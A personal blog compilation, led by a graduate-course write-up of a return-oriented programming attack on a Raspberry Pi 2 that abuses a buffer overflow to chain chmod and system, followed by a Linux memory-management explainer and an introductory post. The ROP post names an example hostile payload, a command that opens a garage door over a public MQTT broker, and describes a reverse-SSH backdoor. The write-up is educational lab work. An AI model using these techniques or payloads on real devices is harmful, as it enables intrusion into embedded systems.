ROP-ing the Pi – A demo on hacking into embedded systems

Recently, one of our graduate level classes had a project where we were tasked with coming up with a Return Oriented Programming(ROP) attack for CPU architectures popular in embedded devices. Given the hardware I had on hand, I chose to attack the Raspberry Pi2 which uses the 32-bit ARMv7 architecture. It was an interesting experiment which highlights the importance of scrubbing inputs and performing bounds checks in our programs – especially in-house applications tailor made to perform very specific tasks.

There are already a multitude of defenses against ROP attacks on many modern systems. For instance, the linux kernel has long since provided Address Space Layout Randomization (ASLR) and GCC usually has its stack protector flag on by default.

While these security measures do make it more difficult to perform such attacks the use of such mechanisms often incurs an operational overhead cost which many embedded systems operating on tight performance, price, and power margins are unable to afford, and thus do not enable.

Background on Buffer Overflows

In the realm of security very often small vulnerabilities provide footholds for larger, more dangerous bugs and exploits. One such exploit is more common than you would think – it’s called a buffer overflow vulnerability. Return-oriented programming attacks occur when there is some way to gain access to the Program Counter and control the execution flow of the program, and buffer overflows provide exactly that.

In a typical C program running on 32-bit ARM, when a function calls another function, its old link register and frame pointer of the previous stack frame are saved onto the stack before making way for the automatic variables in the new frame. An example of a stack frame is shown below:

A buffer overflow happens when the Old Link Register address, highlighted in Red is overwritten. Upon returning from this function, the old link register will be popped from the stack and swapped into the Program Counter (PC) and the computer will continue executing the instructions at that address. The key here is to overwrite that stack slot with an address of our choosing, redirecting the control flow of the program. The most common way this is done is when there is an array declared as a local variable in the function. If bounds are not properly checked, certain functions such as strcpy, read, and recv can write more bytes than was allocated on the stack, causing an overflow, allowing the attacker to write to the Old Link Register address.

ROP Background

Before we go to our exploit, we’ll just touch a bit on the general idea of ROP. Once we have control over the program counter through the buffer overflow, what do we do? Before Data Execution Prevention, what would often happen is hackers would inject shellcode (essentially machine code instructions) into the stack via the same overflow we just exploited and have the PC jump back to the stack with the help of a NOP slide. This is no longer possible due to a simple mechanism known as Data Execution Prevention(DEP). I didn’t add this into the list of ignored security features because DEP has a fairly light overhead. In essence, the stack Virtual Memory Area (VMA, we discussed this in the previous blog post) is marked as readable, writable, but not executable.

If you’re on a Linux system you can see it for yourself. Just print your VMA mapping of the current process by doing sudo cat /proc/self/maps and look at the VMA marked as [stack]. You will see its access flags should be set to rw-p. A funny thing to note is Raspbian has its DEP disabled by default for some reason…but we’re not going to take the easy way out and send a shell script as that would be trivial compared to ROP, and where would the fun be in that!?

7ffd8760f000-7ffd87630000 rw-p 00000000 00:00 0                          [stack]

To get around DEP, we will jump to snippets of machine instructions in existing .txt sections in the application itself and libraries that have been loaded in. We call these gadgets. The key here is we are not strictly bound by program execution flow. We can jump for gadget to gadget to perform a myriad of instructions.

Target System

Alright! Enough background, let’s get to the fun stuff – the target system and the attacker!

Our setup for the victim is shown below. We assume the system is a temperature sensor connected to a RaspberryPi 2. The computer in the middle is our intruder which will send the overloaded payload. The RPI2 acts as a connection to a server and may perform data analysis on the data before sending updates to the server. Every hour, the temperature sensor module sends data over the UART bus to the RPI2 in the form of a data log. The RPI2 will then save the data into a temporary log file until the communication is complete before swapping the temporary file with the log file.

The pseudocode of the application on the Raspberry Pi2 might look like the following:

for (;;){    if (log.txt doesn't exist)         Create log.txt and block at read         When data arrives, get header         Read N bytes into buffer using header's information         Close(log.txt)   else if(log.txt exists)         Create temp.txt and block at read         When data arrives, get header         Read N bytes into buffer using header's information         Replace log.txt with temp.txt}

The header is shown here:

This is a reasonable setup to emulate embedded systems which might be out in the field. In my years working as an embedded software engineer I have seen similar application level communication protocols to send other types of data. Not necessarily over UART, but the implications are the same – we can control the number of bytes being read in as the payload if we have a malicious header and if bounds checking is not enforced.

The Attack

The attacker will run a C Program that sends the log file payload over to the victim RPI2. In order to find the amount of padding we require to overflow and reach the old Link Register’s location, we first send an experimental payload of varying characters and run GDB on the RPI2.

We note how far we are at this point from where R11 is pointed to (Refer back to the stack diagram) and add or decrease padding until we reach the stack slot right before the target slot. There is a more scientific method of performing this task – using a pattern generator provided by the metasploit framework and finding the offset into the unique pattern but it was not necessary since we had access to the RPI2 and could view the state of the stack at the time of the overflow. I find the best way to test this quickly is by using python to create the payload file:

Now that we have the padding required to overflow to the old Link Register’s slot, we need to search for a list of gadgets to add to our ROP payload. There are many ways to find gadgets – by using radare2, objdump, or by using ROPgadget. We used ROPgadget to dump out a list of gadgets from the program binary. Here’s some of them:

Notice that all gadgets end with an instruction that changes the execution flow, be it a blx to r3, a bx to r3, or a pop pc. This allows us to chain multiple gadgets together to perform all sorts of operations. ROP itself is turing complete – we can make loops, conditionals and jumps using it. However, we do not need many gadgets to perform dangerous operations.

In our case, we simply want to do the following in order:

Send a seemingly benign log file over to the Raspberry Pi2 with no overflows. This will actually contain a bash script to echo “Here be dragons”. (This can be modified to contain other more malicious commands as we’ll see later). Recall that on completion of logfile transfer it will be saved as “log.txt”.
Send a malicious header+payload to overflow device while it’s writing to “temp.txt”.
Malicious payload will call chmod(“log.txt”, 777), followed by system(“log.txt”) to execute the shell script.

On an instruction level, however, we will need to follow the ARM function calling convention in order to set the arguments for these functions. We need these in order to perform the calls:

Address of chmod function loaded in libc.
Address of system function loaded in libc.
Address of “log.txt” string. This will be in the .rodata section.
Gadget or list of gadgets to load or pop data from our stack payload to r0 and r1, the first two arguments of a function call.

chmod, the “log.txt” string and system can easily be found with the use of gdb. Remember to break in main AFTER libc has been loaded to memory:

We now have requirements 1, 2, and 3. To fulfill 4, we look into the list of gadgets we found earlier and find gadgets which can help us. We will use these gadgets found in libc:

Number 1 will pop 8 values from the stack into these registers in order.
Number 2 will move r7 into r0, r8 into r1, r9 into r2.
Number 3 will branch to the address in r3.

With these, we are capable of performing as many 3-argument libc calls as we want as long as we have remaining overflowed stack.

Let’s walk through it:

The first gadget we jump to is at tag (1). This gadget will pop 8 values from the stack. Thus, we will load our stack with the following:
1. Address of our first libc call, in this case,chmod.
2. Some value, doesn’t matter what it is. We used 0x42414241 (ABAB).
3. Padding, don’t care.
4. Some value, doesn’t matter what it is as long as it’s the same as (b). We used 0x42414241 (ABAB).
5. Address of “log.txt” string. For us, that string was “/home/pi/pirop/log.txt”.f) 0x309. This is equivalent to 777 in decimal, this will be the second argument.
6. Padding, don’t care.
7. Address of gadget at (2), mov r0, r72.
After the gadget at (1) has executed, it will jump to the gadget at (2) because the address of the gadget at (2)was popped to the PC. It will execute until it reaches the instruction at (3) which will then branch, link, and exchange to the address contained in r3 – our chmod call.
Upon returning, the PC will execute the cmp r4, r6 instruction. Since they were made to be equal, it continues past the bne instruction and we are once again back to the gadget at (1). We then loop this sequence once more for the system() libc call. For the remainder of the discussion, we will give these gadgets names. The gadget at tag (1) will be called POP_8 because it pops 8 values from the stack and the gadget at tag (2) will be called MOV_R7_R0 after the first instruction in the sequence.

With this in mind, this is how our overflowed stack will look like:

Putting it all together

We complete our ROP payload python file following the stack layout detailed earlier:

Start up the program on the Pi, send the shell script with a good header from the computer, then send the exploit payload, and watch as the magic happens:

As seen in the screenshot above, log.txt is now readable, writable, and executable. It contained the script to echo “Here be dragons!”. This, of course, is benign, but dangerous shell script payloads include:

mosquitto_pub -h iot.eclipse.org -t home/garage_door -m "OPEN"

Or a payload to add the public key of a server and the attacker and have the Pi reverse ssh to that server, providing the attacker will remote password-less ssh capability to the system.

I hope you found this an interesting read. Moral of the story – do bounds checking!

Linux Memory Management – Part 1

What a strange thing to start off with! This semester I’m taking Advanced Linux Kernel Programming, a graduate level course at Virginia Tech.

Memory in the Kernel (whether it be Virtual Memory, Physical Memory, the slab layer, software caches, hardware caches) was one of the core takeaways of the course. Being as important and all-encompassing as it is, the concepts themselves are often explained in isolation and indeed, the implementation details span many chapters in reference books. What takes some reading, experimenting and understanding is the glue that binds these concepts together. I’m by no means an expert on the matter. However, this might actually work to our advantage as we won’t be assuming too much. I hope to provide my take/understanding on that glue here along with the tidbits of knowledge our professor gave to us throughout the course.

First things first – we will be talking about the Volatile Memory in a system, commonly known as RAM. It is byte addressable – which is different when compared to other Non-Volatile Memory storage (more on that in another post).

Virtual Memory

So, virtual memory – it gives the illusion of the system having more physical memory than we actually do. Here’s a diagram of that from Wikipedia:

Here are some things to always, always keep in mind as we proceed with our discussion of physical and virtual memory. The virtual memory footprint can be much larger than that of available physical RAM. Why? Virtual Memory is a way of “Reserving” RAM, creating a contract saying “Yes, this is the memory I need, I don’t care if it’s actually allocated right now, as long as I have it when I need it”. Thus, the kernel’s memory management system is free to lazily allocate physical memory to a given process only when it needs it. This is called demand paging. This setup essentially allows us to have much more Virtual Memory than there is Physical Memory. It also allows us to give multiple different processes the illusion that they have their own memory addresses starting at x and ending at y, while in reality, they are mapped to different physical memory locations.

The entire system’s Virtual Memory map would look similar to the diagram below. Note that higher linear addresses belong to the kernel while lower addresses belong to userspace. The “hole” is there due to the fact that while most modern processor architectures support 64-bit addresses and do indeed have 64-bit registers, memory access hardware only needs to support 48-bit addressing (providing us with up to 256 tebibytes of virtual memory). This is seen as more of a manufacturing cost awareness measure as indexing up to 16EB of memory is not needed at this point in time.

While we’re here, let’s just briefly go over the individual sections in kernel space memory shown below. From left to right,

dirmap is the direct mapping of ALL physical addresses to the kernel’s virtual memory. This is where it’s important to keep in mind the fact that virtual memory is an illusion, and by having that mapped there, it’s merely saying that “If we access memory at that address, we can get the contents of the physical memory using a 1 to 1 mapping”. This is why the user | kernel boundary is guarded so tightly. Access to the kernel potentially means access to all currently mapped memory in the system. The direct mapping is also often used to access devices through memory-mapped-io. The ioremap kernel function provides an api to map these devices into usable virtual memory.
vmalloc region is the virtual memory region where any calls to vmalloc will allocate physical memory (usually in the high-memory) to.
virtual mem map where the page tables reside.
kernel text .txt section for the kernel loaded.
modules device drivers and other kernel modules loaded on demand.

In Linux, the Virtual Memory is tracked in a per-process structure called the mm and defined by struct mm_struct. You can find the definition here. Check the latest version of the kernel at the time of reading as the code does change (maybe not the core, but parts will change from version to version). We will go over the specifics of that data structure after touching the key concept that is the Virtual Memory Area(VMA).

The VMA is a logical concept and is represented by a kernel data structure called struct vm_area_struct. A single process has 1 mm_struct descriptor, that mm_struct descriptor will have many VMAs it has references to. Within a single process, each VMA maps to a non-overlapping contiguous chunk of memory containing the same permissions flags.

Try it yourself – on a linux system type the command below:

sudo cat /proc/1/maps

Now we’re ready to talk about the mm_struct or memory descriptor. Shown below is a minimized version of struct mm_struct, with many members not included for the brevity of this discussion.

struct mm_struct {	struct {		struct vm_area_struct *mmap;		struct rb_root mm_rb;				unsigned long mmap_base;		unsigned long task_size;		unsigned long highest_vm_end;		pgd_t * pgd;		int map_count;		spinlock_t page_table_lock;		struct rw_semaphore mmap_sem;		struct list_head mmlist;		unsigned long total_vm;	} __randomize_layout;	unsigned long cpu_bitmap[];};

mmap and mm_rb are essentially different data structure linkages for the same VMAs owned by a particular process. mmap is a linked list of VMAs usually used to clear them all, and mm_rb is a red-black tree of VMAs, used for fast lookups. pgd holds the physical address of the Page Global Directory (PGD), and is also written into the CR3 register so the memory management unit can help us walk the table to find our Virtual Address to Physical Address mapping – something we will go over briefly in the next section.

Hardware

None of this would work fast without the help of hardware. Like many other things, having extra help from the hardware is a tried and tested way to increase throughput. Similar to how graphics rendering or highly parallelized workloads might be delegated off to the GPU or FPGA’s, memory operations are delegated to the Memory Management Unit(MMU)!
A physical diagram of what the MMU and its relationship with memory might look like is shown here:

Let’s break it down. The SoC(System on Chip) has a memory controller which it uses to interface with physical RAM via a communication bus. This then interfaces with the MMU . For the Intel x86_64 architecture, the CR3 Register will simply hold the address of the Page Global Directory entry for a given process.

One important thing to remember is the PGD entry is a per-process structure. We will cover the PGD -> PUD -> PMD -> PTE page frame mapping in the next section. For the sake of this discussion, it is enough to know that the MMU takes a Virtual Address and returns a Physical Address if it’s found. You might be wondering what happens to it when a context switch occurs since it’s a per-process structure! After all, this is the hardware itself now and there is no virtualization at this level. At each context switch, the CR3 register is updated to point to the new PGD entry for that given process (represented by a struct task_struct).

The Translation Lookaside Buffer (TLB) is part of the hardware and performs the role of caching virtual to physical address translations. Walking the page tables can be an expensive process and while relatively small the TLB is integral to reducing the time it takes to perform an address translation.

The MMU plays these three crucial roles with respect to our discussion:

Does a TLB Check to see if the PTE is currently cached.
Performs page table walks to find Virtual Address to Physical Address mappings.
Traps into the kernel to handle the page fault if the page table and TLB do not contain a PTE for a given Virtual Address. (Linux in general is really lazy and will grow the Virtual Address space first and wait for pagefaults before mapping in the Physical Memory)

Paging in Linux

Now that we’re aware of the virtual memory to physical memory relationship within processes is structured in the kernel and the hardware’s role in this let’s talk about how the kernel and the hardware maintain this accounting – via Paging. When learning about paging, one thing that completely threw me off was the fact that it has very little to do with the page cache, another concept in Linux and how the non-volatile memory is managed. While they do indirectly interact with each other through swapping, we will cover that in another part.

Pages or page frames are physically contiguous blocks of volatile memory. In Linux systems, given a linear address they are arranged as such, forming a radix tree with a key that is the virtual address, and value being the physical address. Again, each process will have its own memory descriptor, and thus, its own tree. The actual layout of each page table entry(PTE) is architecture specific, but usually there is a bit denoting if that physical page is currently in use by another process to avoid overlapping physical pages:

Each Level of the tree is based on a key index at an offset from the linear virtual address, as seen here:

Since these types are architecture specific, as expected, you can find them in architecture specific directories within the kernel source: x86 is here. For example, pud_t, pmd_t and pgd_t.

Connecting These Concepts Together

Finally, a quick note on how these concepts tie together in a basic memory request.

A process attempts to access a memory address in a particular VMA.
The MMU checks its TLB to see if it has that entry cached.
If the entry isn’t cached, the processor will do a page-table walk using the pgd stored in its cr3(on x86) register to find the particular page frame.
The page frame offset is found and the memory is retrieved.

Here’s the big question – we know that VMAs are virtual contracts, so they can be grown and decreased at will by the kernel, without actually mapping to physical memory! What happens if in step 4, the page frame is NOT found in physical memory? This is where page faults and demand paging comes in. Think about it. We’ll cover that in Part 2.

The Beginning

If anyone stumbles upon this blog, welcome. I’m creating this as a way to force myself to write down my understanding of concepts as I learn them, more as a public class notebook. Making it public does two things:
1) The knowledge that people way smarter and more adept might be reading this will force me to do proper research and triple-check my grasp of concepts before posting.
2) If people in search of answers come across it and it helps them, awesome!

The creation of this project has been in my mind for quite a while now, but I never had the motivation and time to go through with it – it was always quite low on the priority list. Now that I’m in grad school, what better way to learn and share knowledge than this! Teaching is always a nice way to reinforce knowledge.

Topics we’ll be discussing here:

Linux Kernel Programming and core linux concepts.
Security and exploits.
Home automation projects.
Any other Computer Engineering related things I happen to learn.

The Journey Begins

Thanks for joining me!

Good company in a journey makes the way seem shorter. — Izaak Walton

本站仅提供存储服务，所有内容均由用户发布，如发现有害或侵权内容，请点击举报。